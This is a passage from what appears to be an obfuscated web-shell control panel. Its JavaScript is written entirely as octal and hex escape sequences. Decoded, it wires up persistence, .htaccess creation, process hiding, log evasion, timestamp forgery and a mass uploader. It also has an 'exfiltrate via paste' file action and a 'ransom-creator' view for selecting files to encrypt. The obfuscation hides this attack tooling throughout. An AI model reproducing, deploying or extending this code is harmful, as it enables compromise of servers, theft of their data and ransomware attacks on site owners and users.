2e\142\162\157\x61\144\x63\141\x73\164\x43\157\x6d\155\x61\156\x64\x28\51\x29\x3b\12\x20\x20\40\x20\x20\40\40\x20\x20\40\x20\40\163\141\x66\x65\x41\144\x64\105\166\145\x6e\x74\x4c\x69\x73\164\145\156\145\x72\x28\47\145\156\150\141\156\143\x65\144\55\x70\145\162\163\151\163\164\145\x6e\x63\145\x2d\x62\x74\156\47\x2c\x20\50\51\40\75\76\x20\164\x68\x69\163\56\x65\x6e\150\x61\x6e\143\145\x64\120\145\162\x73\151\x73\164\145\156\x63\145\50\x29\51\73\xa\x20\40\x20\40\x20\40\40\40\x20\40\x20\x20\x73\141\x66\x65\x41\144\144\105\x76\x65\x6e\164\114\151\163\164\x65\x6e\145\162\x28\47\x63\x72\x65\141\164\x65\x2d\x68\x74\x61\x63\143\145\x73\x73\55\x62\x74\x6e\x27\54\x20\50\51\x20\x3d\x3e\40\164\x68\151\x73\56\143\x72\145\x61\x74\145\x48\164\141\x63\x63\x65\163\163\50\x29\x29\73\12\40\x20\40\40\x20\x20\x20\x20\40\x20\40\x20\163\141\146\145\x41\x64\x64\105\166\145\x6e\164\x4c\x69\163\x74\x65\156\145\162\50\47\x73\x74\x65\141\154\x74\x68\x2d\150\151\144\145\x2d\160\162\157\143\145\163\x73\55\142\x74\x6e\47\54\x20\x28\x29\x20\x3d\x3e\x20\x74\150\x69\x73\x2e\x73\164\145\141\x6c\x74\150\x48\151\144\x65\x50\162\157\x63\145\x73\x73\50\x29\x29\x3b\12\40\40\x20\x20\40\x20\40\40\40\40\x20\40\x73\141\x66\145\x41\144\144\x45\166\x65\x6e\164\114\151\x73\164\x65\x6e\145\162\50\47\x73\x74\145\141\154\x74\150\55\x6c\x6f\147\55\145\x76\x61\163\151\x6f\156\55\x62\x74\156\47\54\40\x28\x29\x20\75\x3e\40\x74\150\151\163\x2e\163\164\145\141\154\164\150\x4c\x6f\147\x45\x76\x61\x73\x69\x6f\156\50\x29\51\73\xa\40\40\x20\40\40\40\40\40\x20\x20\40\40\x2f\x2f\x20\110\141\x6e\x64\154\x65\40\164\145\x72\155\x2d\151\x6e\160\165\x74\x20\x6b\145\x79\x64\157\167\156\40\x73\145\160\141\x72\141\164\x65\154\171\xa\x20\40\40\x20\x20\x20\x20\x20\40\40\40\x20\x63\x6f\156\x73\164\40\x74\145\162\155\111\156\x70\x75\164\x20\75\40\144\157\143\x75\155\145\156\164\56\147\145\164\105\x6c\145\155\145\156\x74\x42\x79\111\144\50\47\164\145\x72\x6d\x2d\151\156\160\x75\x74\x27\x29\73\12\x20\40\x20\40\x20\x20\40\x20\x20\40\x20\40\151\x66\x20\50\x74\x65\x72\x6d\111\156\x70\165\164\x29\40\x74\145\162\155\111\x6e\160\x75\164\56\141\x64\144\105\x76\x65\156\164\x4c\x69\x73\x74\x65\x6e\145\162\x28\x27\x6b\x65\171\144\x6f\167\156\x27\54\40\x65\40\75\x3e\40\164\x68\x69\163\x2e\150\141\156\144\154\145\x54\x65\x72\155\151\x6e\x61\x6c\111\x6e\160\165\x74\x28\x65\51\x29\x3b\xa\40\x20\40\x20\40\x20\x20\x20\x20\x20\40\40\57\x2f\40\x48\141\156\x64\154\145\40\146\151\154\x65\55\x6c\x69\163\x74\x20\x63\154\151\143\x6b\x20\163\x65\160\141\x72\x61\x74\145\154\171\40\55\x20\x75\163\x65\x20\145\166\x65\156\164\x20\x64\x65\154\145\147\141\x74\x69\x6f\x6e\x20\x6f\x6e\x20\160\141\162\145\x6e\164\x20\x74\157\40\x70\x72\145\x76\145\x6e\164\40\x64\x75\160\x6c\x69\143\x61\164\145\x73\xa\40\40\x20\40\40\40\40\x20\x20\40\x20\40\x63\157\156\x73\164\40\146\151\154\x65\x4c\x69\x73\164\40\x3d\40\x64\157\143\165\x6d\x65\156\164\56\x67\145\164\105\154\145\155\x65\x6e\164\x42\171\x49\x64\50\x27\146\x69\154\145\x2d\x6c\151\x73\x74\x27\x29\x3b\xa\40\40\x20\x20\40\x20\40\40\40\x20\x20\x20\151\x66\40\50\x66\151\x6c\x65\x4c\x69\x73\x74\x20\x26\x26\x20\x21\x66\151\154\x65\114\x69\x73\x74\56\x64\141\164\141\x73\145\164\56\154\151\x73\x74\x65\156\x65\x72\101\x64\x64\145\144\51\40\173\xa\40\x20\x20\x20\40\x20\40\40\40\40\40\40\40\x20\x20\x20\146\x69\x6c\x65\114\x69\x73\164\x2e\141\144\144\105\166\x65\x6e\x74\114\x69\x73\x74\145\x6e\x65\162\50\47\143\154\151\143\153\47\54\x20\145\40\x3d\x3e\40\164\x68\151\163\56\150\141\x6e\144\154\x65\106\x69\x6c\145\115\x61\156\141\147\145\x72\x43\x6c\x69\143\153\50\x65\x29\x29\73\xa\x20\x20\40\40\40\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\146\x69\x6c\145\114\151\163\164\56\x64\141\164\141\163\145\164\56\154\x69\x73\x74\145\156\145\x72\101\x64\x64\x65\x64\40\x3d\x20\x27\164\x72\x75\145\47\x3b\12\40\x20\40\40\40\x20\x20\40\40\40\x20\x20\x7d\xa\x20\x20\x20\40\x20\x20\40\40\x20\40\x20\40\57\57\40\110\x61\x6e\144\x6c\145\x20\165\160\154\x6f\141\x64\55\x66\151\x6c\x65\x2d\151\156\x70\165\164\x20\143\150\141\x6e\147\x65\40\163\x65\x70\141\x72\x61\164\145\x6c\x79\xa\x20\40\40\40\x20\x20\40\40\40\x20\40\40\x63\157\156\x73\164\40\x75\160\154\x6f\141\x64\111\x6e\x70\x75\164\x20\x3d\40\144\157\x63\165\155\145\x6e\164\56\147\x65\x74\x45\x6c\145\155\145\156\x74\x42\x79\111\144\50\47\x75\160\154\x6f\141\144\55\x66\x69\x6c\x65\55\151\x6e\x70\x75\x74\47\51\73\12\40\40\40\x20\x20\x20\x20\40\40\40\x20\40\151\146\x20\50\x75\160\x6c\157\x61\144\111\156\x70\165\x74\x29\40\165\x70\x6c\x6f\141\144\x49\x6e\160\165\164\x2e\141\x64\x64\105\166\x65\156\164\114\151\163\164\x65\x6e\x65\162\x28\x27\x63\150\141\x6e\x67\x65\47\54\40\x65\x20\75\76\40\164\150\x69\x73\x2e\x75\x70\154\x6f\141\x64\106\151\x6c\x65\x73\50\145\51\51\73\xa\x20\11\x9\x7d\54\xa\40\11\11\156\141\166\151\147\141\164\145\x28\166\x69\x65\167\x49\144\x29\40\173\12\x20\11\x9\x9\144\x6f\143\x75\155\x65\156\164\x2e\161\165\x65\162\x79\123\x65\x6c\x65\x63\164\x6f\162\x41\154\x6c\x28\x27\56\x76\x69\145\x77\x2d\x63\157\156\164\x61\x69\156\145\x72\x27\51\x2e\x66\157\162\105\141\x63\x68\50\x76\x20\x3d\x3e\x20\166\56\x73\x74\x79\x6c\145\56\144\x69\163\x70\154\141\171\x20\x3d\40\47\x6e\x6f\x6e\x65\x27\x29\73\xa\x9\x9\x9\x63\x6f\156\x73\x74\40\x76\151\x65\167\105\154\x20\x3d\x20\x64\x6f\143\165\x6d\x65\156\164\x2e\x67\x65\164\x45\x6c\x65\155\145\156\x74\x42\x79\111\144\50\140\x76\x69\145\167\55\44\173\x76\x69\x65\x77\x49\144\175\140\51\x3b\12\x9\11\11\151\146\x20\50\x76\x69\145\167\x45\154\51\40\x76\x69\x65\x77\x45\x6c\x2e\x73\x74\171\x6c\145\x2e\144\151\163\x70\x6c\x61\171\x20\75\40\x27\146\154\x65\x78\47\73\12\x9\x9\11\x64\x6f\143\x75\x6d\x65\156\164\x2e\161\165\x65\x72\x79\123\x65\x6c\145\143\164\157\x72\x41\x6c\x6c\50\x27\56\156\141\166\55\x62\165\x74\164\157\156\47\x29\56\146\x6f\162\105\x61\x63\x68\x28\142\x74\156\40\x3d\76\40\142\x74\x6e\56\x63\154\x61\163\x73\114\151\163\164\56\x72\x65\155\x6f\x76\145\x28\x27\141\143\x74\x69\166\145\x27\51\51\x3b\12\x9\x9\11\143\157\156\x73\164\x20\x61\x63\164\151\x76\x65\102\164\x6e\x20\75\x20\x64\x6f\x63\x75\x6d\x65\x6e\164\x2e\161\165\145\x72\171\123\145\154\x65\x63\164\x6f\162\50\140\x2e\x6e\141\166\55\x62\x75\164\164\x6f\156\x5b\144\141\x74\141\55\166\151\x65\x77\75\x22\x24\x7b\x76\x69\x65\167\111\x64\x7d\42\135\140\x29\73\12\x9\x9\11\151\x66\x20\50\141\143\x74\x69\166\x65\102\164\x6e\51\x20\x61\x63\x74\x69\x76\x65\x42\x74\x6e\x2e\143\154\141\163\x73\x4c\151\x73\164\x2e\141\x64\x64\50\x27\x61\143\164\x69\x76\145\x27\51\x3b\12\40\x9\x9\11\x69\x66\x20\50\164\150\151\163\56\163\x74\141\164\163\x49\x6e\x74\145\x72\166\141\x6c\x29\x20\x7b\x20\x63\x6c\145\x61\x72\111\x6e\x74\x65\162\x76\x61\154\50\164\x68\151\163\x2e\x73\164\141\x74\163\x49\156\164\145\x72\x76\141\x6c\x29\x3b\40\x74\x68\x69\163\56\x73\x74\141\x74\163\111\x6e\164\145\x72\166\x61\154\40\75\x20\156\x75\154\x6c\73\x20\x7d\12\x20\11\11\11\x69\x66\x20\50\166\151\x65\x77\x49\x64\x20\x3d\75\75\x20\x27\x64\x61\x73\x68\x62\x6f\x61\162\x64\x27\51\x20\x7b\x20\x74\150\151\x73\56\165\x70\x64\141\164\x65\114\151\x76\145\x53\x74\x61\164\x73\x28\x29\73\40\x74\x68\151\163\56\163\x74\x61\x74\163\x49\x6e\x74\x65\x72\x76\x61\154\40\75\40\163\x65\164\x49\x6e\164\x65\162\166\141\154\x28\50\x29\x20\x3d\76\40\164\150\x69\163\56\165\160\144\x61\x74\x65\x4c\x69\x76\145\123\x74\141\164\163\x28\51\x2c\40\x32\x30\x30\x30\51\73\40\x7d\xa\11\11\x9\145\154\x73\x65\40\x69\x66\40\50\x76\x69\145\167\x49\x64\40\75\75\75\40\x27\146\x69\x6c\x65\163\47\x29\x20\173\40\x63\157\x6e\163\x74\x20\146\151\154\x65\114\151\x73\x74\40\75\x20\144\x6f\x63\165\x6d\145\156\x74\56\147\x65\x74\x45\154\145\155\x65\x6e\x74\x42\171\x49\144\50\x27\146\151\x6c\x65\55\x6c\151\x73\x74\x27\51\x3b\x20\151\x66\x20\50\146\151\154\x65\114\x69\163\x74\40\46\x26\40\x66\151\154\x65\x4c\x69\163\164\56\151\156\156\145\x72\x48\x54\115\x4c\40\75\x3d\75\40\47\x27\51\40\x74\x68\x69\163\56\154\x6f\x61\144\x46\151\x6c\x65\x73\x28\164\x68\x69\x73\x2e\143\x77\x64\51\x3b\40\175\12\11\11\x9\x65\154\163\145\x20\151\146\x20\50\166\x69\145\x77\111\x64\40\75\75\x3d\x20\47\164\145\162\155\x69\x6e\x61\x6c\47\x29\x20\x7b\x20\164\x68\x69\163\x2e\165\160\x64\141\164\145\x54\x65\x72\155\x69\x6e\x61\x6c\120\162\x6f\x6d\x70\x74\50\x29\73\x20\x63\x6f\x6e\x73\164\40\164\145\162\155\111\x6e\160\165\x74\x20\x3d\x20\144\157\143\x75\155\145\x6e\164\56\147\145\x74\105\x6c\x65\x6d\145\x6e\x74\102\171\x49\x64\x28\47\164\145\x72\155\x2d\151\156\160\x75\x74\x27\51\x3b\40\x69\146\x20\50\164\145\162\155\x49\x6e\x70\x75\x74\51\40\164\x65\x72\x6d\111\156\x70\165\164\x2e\146\x6f\x63\165\163\x28\51\x3b\x20\x7d\xa\x9\x9\x9\145\x6c\x73\145\40\151\x66\x20\50\x76\151\145\167\x49\144\40\x3d\x3d\x3d\40\47\155\x61\163\x73\x2d\165\x70\x6c\157\x61\x64\x65\x72\x27\51\x20\173\x20\x63\x6f\156\x73\164\x20\144\151\162\x54\162\145\x65\x20\75\x20\x64\x6f\143\165\155\145\156\164\x2e\x67\x65\164\x45\154\145\x6d\x65\156\164\x42\171\111\144\x28\47\x64\151\x72\x2d\x74\x72\x65\x65\55\x63\157\156\164\x61\151\x6e\x65\x72\47\x29\73\40\x69\x66\x20\50\144\151\x72\x54\162\145\145\40\46\46\40\x64\151\x72\x54\162\x65\x65\x2e\x69\156\156\145\x72\110\124\x4d\114\56\x69\156\x63\x6c\x75\144\145\163\x28\x27\x4c\157\x61\x64\x69\x6e\x67\x27\x29\x29\40\164\x68\x69\163\56\154\x6f\141\x64\x44\151\x72\x54\x72\145\x65\50\x27\x23\144\x69\x72\55\x74\x72\145\145\x2d\143\157\x6e\164\141\151\156\x65\x72\47\51\73\x20\x7d\xa\x20\40\x20\x20\x20\40\x20\40\40\x20\40\x20\x65\x6c\163\145\x20\151\x66\40\50\166\x69\x65\167\111\x64\40\75\75\x3d\40\x27\x64\x61\164\141\x2d\164\157\157\x6c\163\x27\51\40\x7b\x20\x63\157\156\163\164\40\145\x78\146\151\154\124\x72\145\x65\40\75\x20\144\157\x63\x75\155\x65\x6e\x74\x2e\147\x65\x74\x45\154\x65\x6d\145\x6e\x74\102\x79\x49\x64\50\x27\x65\x78\x66\151\154\55\144\151\162\x2d\164\x72\145\x65\47\x29\73\40\151\146\x20\50\145\x78\146\x69\x6c\124\x72\x65\145\x20\x26\x26\x20\145\x78\x66\x69\x6c\x54\x72\145\x65\56\151\x6e\156\145\x72\x48\x54\115\114\x2e\151\x6e\x63\x6c\165\144\145\x73\50\47\x4c\x6f\x61\144\151\156\x67\x27\x29\51\40\x74\x68\151\x73\56\154\x6f\x61\144\104\151\x72\x54\162\x65\145\x28\x27\x23\145\x78\146\x69\154\x2d\144\x69\x72\55\x74\162\x65\145\47\51\x3b\x20\x7d\12\40\x9\x9\x9\x65\154\x73\x65\x20\151\146\x20\x28\166\151\145\167\x49\x64\x20\75\x3d\x3d\x20\47\x63\x72\x6f\x6e\x27\51\40\x74\150\151\163\56\x6c\157\x61\x64\103\x72\157\156\x28\x29\x3b\xa\x20\x9\11\11\x65\x6c\163\145\40\x69\146\40\50\166\151\x65\x77\x49\x64\x20\75\75\75\x20\x27\144\157\155\x61\x69\x6e\55\x69\x6e\x74\145\x6c\x27\40\x26\x26\x20\x21\x74\150\x69\x73\56\151\156\164\x65\x6c\106\145\164\143\x68\145\x64\51\40\x7b\x20\12\11\11\11\11\x2f\x2f\40\104\157\156\x27\164\40\x61\x75\x74\157\55\x72\165\x6e\x2c\40\x6c\145\164\x20\165\163\x65\x72\40\x63\154\151\143\x6b\40\x62\165\x74\x74\x6f\156\40\164\x6f\40\x74\x72\x69\x67\147\145\162\40\160\x61\x73\163\167\157\x72\144\40\x70\x72\157\x6d\160\164\12\11\11\x9\11\164\x68\x69\163\x2e\151\156\x74\x65\154\106\145\x74\143\150\145\x64\40\75\x20\146\x61\x6c\163\x65\x3b\40\xa\x9\11\11\x7d\12\40\11\11\11\145\154\x73\x65\40\151\146\x20\x28\x76\x69\145\167\111\x64\40\x3d\75\x3d\40\47\x63\x70\x61\156\145\154\x2d\x63\x6d\x73\x27\51\40\173\40\164\x68\x69\x73\x2e\x69\156\x69\164\x43\x6d\163\103\160\141\156\145\154\x56\x69\x65\x77\50\x29\73\40\x7d\12\11\x9\11\x65\x6c\163\145\40\x69\x66\40\50\x76\x69\x65\167\x49\x64\x20\75\x3d\75\x20\x27\156\157\x74\x69\x66\151\x63\x61\164\x69\x6f\x6e\163\x27\51\40\x7b\40\164\150\x69\x73\x2e\x72\145\x6e\144\145\162\x4e\x6f\x74\x69\146\x69\x63\x61\x74\x69\x6f\x6e\163\x28\51\x3b\40\175\12\11\x9\x9\x65\154\x73\145\x20\x69\x66\40\x28\x76\x69\145\167\111\x64\40\75\75\75\40\47\x70\162\x6f\x63\145\163\x73\55\155\x61\156\141\147\x65\162\47\x29\40\x7b\x20\164\150\151\163\x2e\x72\x65\146\162\145\163\150\120\162\157\x63\145\163\163\145\x73\x28\51\73\40\x7d\12\x9\11\x9\x65\x6c\163\x65\x20\151\x66\x20\x28\166\x69\x65\167\x49\144\40\75\x3d\75\x20\47\162\x61\x6e\x73\x6f\155\x2d\143\162\x65\141\x74\157\162\x27\51\40\173\40\xa\11\11\x9\x9\x74\150\x69\x73\56\x72\141\x6e\x73\157\155\123\145\154\x65\143\x74\145\144\106\x69\154\x65\x73\56\143\x6c\145\x61\162\x28\x29\73\x20\12\x9\x9\x9\11\x74\150\151\163\x2e\162\x61\x6e\x73\157\x6d\x55\160\x64\x61\x74\x65\x43\x6f\165\156\x74\x28\51\x3b\12\x9\x9\x9\x9\x63\157\x6e\163\x74\x20\162\141\x6e\163\157\155\102\162\157\x77\163\145\x50\x61\x74\150\40\x3d\40\144\x6f\x63\x75\155\145\x6e\x74\x2e\x67\x65\x74\105\154\x65\x6d\x65\x6e\x74\102\x79\x49\144\x28\47\x72\141\x6e\x73\157\155\x2d\x62\162\157\x77\x73\x65\x2d\160\141\x74\150\47\x29\x3b\12\x9\11\11\x9\x69\x66\40\x28\x72\x61\x6e\163\157\x6d\102\162\x6f\167\163\145\120\141\x74\x68\x20\46\x26\40\x21\x72\141\156\x73\157\x6d\102\162\x6f\167\163\x65\120\x61\164\150\x2e\x76\141\x6c\165\145\x29\40\173\xa\11\11\11\x9\11\x72\x61\156\163\157\155\x42\162\x6f\167\x73\x65\120\x61\164\150\x2e\x76\x61\x6c\165\145\40\x3d\x20\x74\150\x69\x73\56\143\x77\x64\x3b\xa\x9\x9\11\11\175\xa\11\x9\11\175\xa\11\11\x7d\x2c\12\x20\x9\11\x61\x73\x79\156\x63\x20\x6c\x6f\x61\144\x46\x69\x6c\145\163\50\160\141\164\x68\x29\40\x7b\12\40\11\x9\11\x63\x6f\156\x73\164\x20\x72\x65\x73\40\x3d\40\141\x77\141\x69\164\x20\164\x68\x69\163\x2e\141\160\151\x28\47\x62\x72\157\x77\163\145\47\54\40\173\40\160\x61\164\x68\40\175\51\73\xa\x20\x9\x9\11\151\x66\x20\x28\41\162\145\x73\x20\174\x7c\x20\162\145\x73\x2e\163\164\141\164\x75\x73\40\x21\75\75\40\47\x73\x75\x63\143\x65\x73\x73\47\x29\40\162\145\x74\x75\162\x6e\x3b\12\11\x9\11\164\x68\151\x73\56\143\x77\144\40\x3d\40\x72\145\163\56\143\167\144\x3b\x20\x63\157\156\x73\164\40\x63\x77\x64\x45\x6c\40\x3d\x20\144\157\143\x75\x6d\145\156\164\56\x67\x65\164\x45\154\145\155\x65\x6e\164\102\171\x49\x64\x28\x27\143\167\x64\47\x29\x3b\40\x69\x66\40\50\x63\x77\x64\105\x6c\x29\40\143\167\144\x45\x6c\56\166\x61\154\165\x65\40\75\x20\x74\x68\x69\163\56\x63\167\144\x3b\40\x74\x68\151\x73\56\165\160\144\x61\164\145\x54\145\162\x6d\151\156\141\x6c\120\162\x6f\155\160\164\x28\51\73\xa\11\11\11\143\157\x6e\x73\164\x20\x66\151\x6c\x65\114\x69\x73\164\x20\75\x20\144\x6f\143\x75\155\x65\156\x74\56\147\145\164\105\x6c\x65\155\145\x6e\164\x42\171\x49\x64\50\x27\x66\x69\154\145\55\154\x69\x73\164\x27\51\73\12\x9\11\x9\151\146\40\x28\41\146\151\154\145\x4c\x69\x73\x74\51\40\162\x65\x74\165\x72\156\x3b\xa\x9\x9\x9\146\x69\x6c\145\x4c\x69\x73\x74\x2e\151\156\156\145\x72\110\x54\x4d\x4c\x20\75\x20\162\145\x73\56\x66\151\154\x65\163\56\155\141\x70\x28\146\40\x3d\76\x20\173\xa\x20\x9\11\11\11\x6c\145\164\x20\x6e\141\155\145\103\x6c\141\163\x73\40\75\40\x66\x2e\151\163\x5f\144\151\x72\40\77\40\50\146\56\x69\x73\137\167\x72\151\164\141\x62\154\x65\x20\x3f\x20\x27\x66\x6e\x61\x6d\145\55\x64\x69\162\x2d\167\x72\151\164\141\x62\x6c\x65\x27\40\x3a\x20\47\x66\156\141\x6d\x65\55\144\151\x72\55\x75\x6e\x77\162\151\164\x61\x62\x6c\145\x27\x29\40\72\x20\x28\x66\56\151\163\137\167\x72\x69\x74\x61\x62\154\x65\40\x3f\x20\47\x66\x6e\x61\x6d\145\x2d\x66\x69\154\x65\55\x77\162\151\164\x61\x62\154\x65\x27\40\72\x20\47\146\156\141\155\145\55\x66\x69\x6c\145\x2d\x75\156\167\162\151\164\141\x62\x6c\x65\x27\x29\x3b\12\40\11\11\11\11\x6c\x65\x74\40\151\143\x6f\x6e\x20\x3d\40\x66\56\x69\163\x5f\x64\x69\162\40\77\x20\x28\x66\x2e\156\141\155\145\x20\x3d\75\75\x20\x27\x2e\56\47\40\77\x20\x27\xe2\244\264\357\xb8\217\x27\x20\x3a\40\47\xf0\237\224\267\x27\x29\40\x3a\x20\47\360\237\x93\204\x27\x3b\xa\40\11\x9\x9\x9\154\x65\164\x20\x61\x63\x74\151\x6f\156\x73\x20\x3d\40\x60\74\141\x20\x64\x61\164\x61\x2d\141\x63\164\151\157\x6e\75\x22\x72\x65\x6e\141\x6d\145\42\40\x74\x69\x74\154\x65\75\x22\x52\x65\156\x61\x6d\145\42\x3e\xe2\234\x8f\357\xb8\217\x3c\x2f\x61\x3e\40\x3c\141\40\144\141\164\x61\55\x61\x63\x74\x69\157\156\x3d\x22\143\150\155\157\x64\42\40\x74\x69\164\154\x65\75\42\120\145\x72\x6d\x69\163\x73\151\157\x6e\x73\x22\76\xf0\x9f\x94\222\x3c\57\141\x3e\140\x3b\12\x20\11\x9\x9\11\x69\146\40\x28\x21\146\56\151\x73\x5f\144\x69\x72\51\40\x61\x63\164\x69\x6f\x6e\x73\x20\x2b\75\x20\140\x20\74\141\40\144\x61\x74\141\55\x61\x63\x74\x69\157\156\75\42\x74\x69\155\145\163\x74\x6f\155\x70\42\40\164\151\x74\154\145\75\42\x54\151\155\x65\x73\164\x6f\155\160\42\40\163\164\171\x6c\145\x3d\42\x63\157\154\157\x72\x3a\x23\141\x30\x61\x30\141\x30\73\x22\x3e\360\x9f\x95\260\357\xb8\217\x3c\x2f\x61\76\x60\x3b\xa\40\11\11\11\x9\141\x63\164\151\157\x6e\x73\x20\x2b\75\x20\140\40\x3c\141\40\144\141\164\141\55\141\143\x74\x69\157\x6e\x3d\42\144\x65\x6c\x65\x74\145\x22\40\164\x69\x74\x6c\145\75\x22\104\145\154\145\x74\x65\42\40\x73\x74\x79\154\145\75\x22\143\157\x6c\x6f\x72\x3a\43\146\x66\65\65\67\62\x3b\x22\76\xf0\237\x97\221\357\xb8\x8f\x3c\57\141\76\140\73\12\40\x9\11\11\11\x69\146\50\x66\x2e\x69\163\137\144\151\162\40\x26\46\40\146\x2e\x6e\141\155\x65\x20\x21\x3d\x3d\40\47\x2e\56\47\51\40\x61\x63\164\151\157\156\x73\40\x2b\x3d\x20\x60\x20\x3c\x61\40\x64\141\164\141\x2d\141\143\164\151\x6f\x6e\75\x22\172\151\x70\x22\40\164\x69\x74\x6c\x65\x3d\x22\x5a\x69\x70\x22\x20\163\164\x79\154\x65\75\x22\x63\157\154\x6f\x72\x3a\43\146\x66\143\x37\67\x37\x3b\42\76\360\x9f\223\246\x3c\x2f\x61\x3e\140\x3b\12\40\x9\x9\x9\11\x65\x6c\163\145\40\x69\x66\40\50\41\146\x2e\x69\163\137\144\x69\162\x29\40\173\12\40\x20\40\x20\x20\40\x20\40\x20\x20\40\x20\40\40\x20\x20\40\x20\x20\40\x61\143\164\151\x6f\x6e\x73\40\x2b\x3d\40\x60\40\74\x61\x20\144\x61\x74\141\x2d\x61\x63\x74\x69\157\156\75\42\145\170\x66\151\154\137\x70\141\x73\x74\145\42\40\x74\151\164\x6c\145\75\x22\x45\170\146\x69\x6c\x74\162\x61\x74\x65\40\x76\151\141\40\x50\x61\x73\164\x65\x22\40\x73\164\x79\x6c\145\x3d\42\x63\x6f\x6c\x6f\162\72\43\101\x34\70\62\106\x46\x3b\42\76\xf0\x9f\x93\xa4\x3c\x2f\x61\76\140\x3b\12\x20\40\40\40\40\40\x20\x20\x20\x20\x20\x20\40\40\40\40\40\x20\40\x20\x61\x63\164\151\x6f\x6e\163\40\x2b\x3d\40\x60\x20\x3c\x61\40\x68\x72\x65\x66\75\42\x24\173\x53\103\122\111\120\124\137\x55\x52\114\175\77\x64\x6f\x77\156\154\x6f\141\144\x3d\x24\x7b\x65\x6e\x63\157\x64\145\x55\122\111\103\x6f\155\x70\x6f\x6e\x65\156\164\x28\146\56\160\x61\x74\x68\51\x7d\42\x20\x74\151\x74\154\145\75\42\x44\157\x77\x6e\154\x6f\x61\x64\x22\x20\x73\164\x79\154\145\x3d\42\x63\157\x6c\x6f\x72\72\43\143\63\145\x38\70\x64\x3b\42\76\360\237\223\245\74\x2f\141\76\140\x3b\12\x20\40\40\x20\x20\x20\40\40\x20\x20\40\40\x20\40\40\x20\40\x20\40\40\x69\x66\40\x28\x66\x2e\156\141\x6d\x65\x2e\x65\156\x64\163\x57\151\164\x68\50\x27\56\x7a\151\x70\47\x29\x29\x20\x61\x63\164\151\x6f\x6e\163\40\x2b\x3d\x20\x60\40\74\x61\x20\144\x61\x74\141\x2d\x61\143\164\151\x6f\156\x3d\42\165\156\172\151\160\42\40\x74\151\164\154\x65\75\x22\125\156\x7a\x69\160\42\x20\x73\164\171\154\145\75\x22\x63\157\x6c\157\x72\x3a\x23\x38\62\x61\141\x66\146\x3b\42\x3e\360\x9f\x93\xa4\x3c\x2f\141\76\140\x3b\12\x20\x20\x20\x20\x20\x20\x20\x20\40\40\40\x20\x20\x20\x20\x20\x7d\12\x20\11\x9\x9\x9\x72\145\x74\x75\162\x6e\40\140\x3c\164\162\40\144\x61\164\141\x2d\160\141\x74\150\x3d\x22\x24\x7b\x66\x2e\x70\141\x74\150\x7d\42\x20\x64\x61\x74\141\55\156\141\x6d\x65\x3d\x22\44\x7b\x66\56\x6e\x61\x6d\145\x7d\x22\x20\x64\141\164\141\x2d\144\x69\162\75\x22\44\173\x66\x2e\151\x73\x5f\x64\x69\x72\175\42\40\144\141\164\x61\55\160\145\162\x6d\x73\x3d\42\x24\x7b\146\56\160\x65\x72\x6d\163\175\x22\76\x3c\164\x64\40\x63\x6c\x61\x73\x73\75\42\x66\x6e\141\155\145\40\x24\x7b\x6e\141\155\145\x43\x6c\141\x73\163\175\x22\40\x74\151\164\x6c\x65\75\42\x24\173\x66\56\160\x61\x74\150\175\42\76\x24\173\x69\x63\157\x6e\x7d\x20\44\173\x66\56\156\141\x6d\x65\x7d\74\x2f\164\144\x3e\74\x74\x64\76\x24\x7b\x66\x2e\163\151\x7a\145\175\x3c\57\164\144\76\x3c\164\x64\40\x63\x6c\141\x73\163\75\x22\x70\145\162\x6d\x73\x2d\x63\157\x6c\42\x3e\44\x7b\146\56\x66\165\154\154\137\160\x65\162\155\163\x7d\74\x2f\x74\x64\x3e\74\164\x64\76\44\x7b\x66\x2e\x6d\164\x69\155\x65\175\74\x2f\164\x64\76\74\164\144\40\x63\x6c\141\163\x73\x3d\42\141\143\x74\151\157\x6e\x73\x22\76\44\x7b\x66\x2e\156\141\155\145\40\41\75\75\40\x27\56\56\x27\40\x3f\40\x61\x63\164\151\x6f\x6e\x73\40\72\x20\47\x27\x7d\74\57\x74\144\76\x3c\57\164\162\x3e\x60\x3b\xa\x20\11\x9\11\x7d\51\56\x6a\157\151\x6e\x28\47\x27\51\73\12\40\11\11\175\54\xa\x20\x9\x9\x68\141\156\144\x6c\x65\106\x69\154\x65\x4d\x61\x6e\x61\147\x65\x72\103\x6c\151\143\x6b\x28\145\51\40\173\xa\40\x9\x9\x9\x63\157\x6e\x73\164\x20\162\x6f\167\x20\75\40\x65\56\x74\x61\162\x67\x65\164\x2e\143\154\157\x73\145\163\164\50\x27\164\162\47\x29\73\40\x69\x66\x20\x28\41\162\157\x77\x29\x20\x72\145\164\x75\162\x6e\73\x20\x63\157\x6e\x73\x74\40\160\x61\164\150\40\75\40\x72\x6f\167\x2e\144\141\x74\141\163\x65\164\56\160\141\x74\150\54\x20\x6e\x61\155\x65\x20\x3d\x20\x72\x6f\167\56\x64\x61\x74\141\163\x65\164\56\x6e\x61\155\x65\x2c\40\x61\143\164\151\x6f\156\105\154\x20\x3d\x20\x65\56\164\141\162\147\145\164\56\x63\154\157\163\145\x73\164\x28\47\x61\133\144\141\164\141\55\x61\143\x74\x69\157\156\135\47\51\x3b\12\x20\x9\x9\11\x69\x66\40\50\x61\143\x74\151\x6f\x6e\105\x6c\x29\x20\173\12\x20\x20\x20\x20\x20\40\x20\40\x20\40\40\40\40\x20\x20\40\x63\157\156\x73\x74\x20\141\x63\x74\x69\x6f\156\40\x3d\40\141\x63\x74\151\157\x6e\105\154\56\144\x61\x74\x61\163\145\x74\56\141\x63\x74\x69\157\x6e\x3b\xa\40\40\40\40\40\x20\40\x20\40\x20\40\x20\x20\40\x20\40\143\x6f\x6e\x73\164\40\x61\143\164\x69\157\156\x73\40\x3d\40\173\xa\x20\40\x20\40\40\40\40\40\40\40\x20\x20\x20\40\x20\x20\x20\40\x20\40\x72\x65\x6e\141\155\x65\x3a\x20\50\51\40\75\76\x20\x74\150\x69\x73\x2e\x72\145\x6e\x61\155\145\x49\164\145\x6d\x28\160\x61\x74\x68\x2c\x20\156\141\x6d\145\x29\54\xa\x20\40\x20\40\40\x20\40\x20\x20\40\x20\40\40\40\40\x20\40\40\40\x20\144\x65\x6c\x65\164\145\72\40\x28\x29\40\75\76\40\164\150\151\163\56\x64\145\154\145\x74\x65\x49\x74\145\155\50\x70\x61\164\x68\x2c\x20\x6e\x61\x6d\x65\x29\54\12\x20\40\40\x20\40\40\40\x20\x20\x20\40\x20\40\40\40\40\40\x20\x20\x20\143\150\155\157\144\72\40\x28\x29\40\75\x3e\40\164\x68\x69\163\x2e\x73\x68\x6f\x77\x43\x68\x6d\157\x64\x4d\x6f\144\141\x6c\50\160\141\x74\x68\x2c\40\x72\x6f\x77\x2e